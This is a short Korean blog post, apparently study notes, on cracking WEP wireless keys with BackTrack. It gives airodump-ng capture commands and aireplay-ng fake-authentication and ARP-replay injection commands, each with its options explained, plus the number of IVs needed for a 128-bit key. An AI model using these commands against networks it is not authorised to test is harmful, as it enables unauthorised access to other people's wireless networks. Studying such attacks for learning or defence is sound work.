[Wireless] Backtrack + WEP Key Cracking
예전에 WEP Key를 크랙했을 때의 자료를 정리해 올려본다.
WEP Key가 깨진것은 쫌 오래된 일이다. 이젠 그리 놀랍지도 않지만, 요즘 무선랜을 공부하는 중에 자료가 있어 정리해 본다.
WEP Key 크랙에 필요한 툴들은 backtrack에 다 있다.
무선 랜카드를 구하는게 문제다.
무선랜카드: Linksys WUSB54G v4 (chipset:Ralink rt2570)
#>airodump-ng –w [save_file_name] rausb0 --channel 1
[airodump-ng 옵션]
-c(--channel): 무선 네트워크의 채널
--bssid: 공격하고자 하는 AP의 MAC 주소
-w: IVs들이 담길 파일 이름
rausb0: 인터페이스 이름
#>aireplay-ng -1 0 –e [ESSID] –a [AP_MAC_addresss(BSSID)] –h [MY_MAC_address] rausb0
[aireplay-ng 옵션]
-1: fake authentication
0: 초당 재연결 시간
-e: ESSID
-a: AP의 MAC 주소
-h: 자신의 랜카드 MAC 주소
Rausb0: 인터페이스 이름
-3: arpreplay 모드
-b: 공격할 AP MAC
#>aireplay-ng -3 –b [AP_MAC_address(BSSID)] –h [MY_MAC_address] rausb0
--> 패킷의 량을 증폭시킨다. 아래화면을 보면 갑자기 패킷량이 증가함을 알 수 있다.
--> 획득한 패킷을 크랙한다.
보통 128bit WEP Key를 크랙하기 위해서는 40,000~85,000개의 IVs값이 필요하다.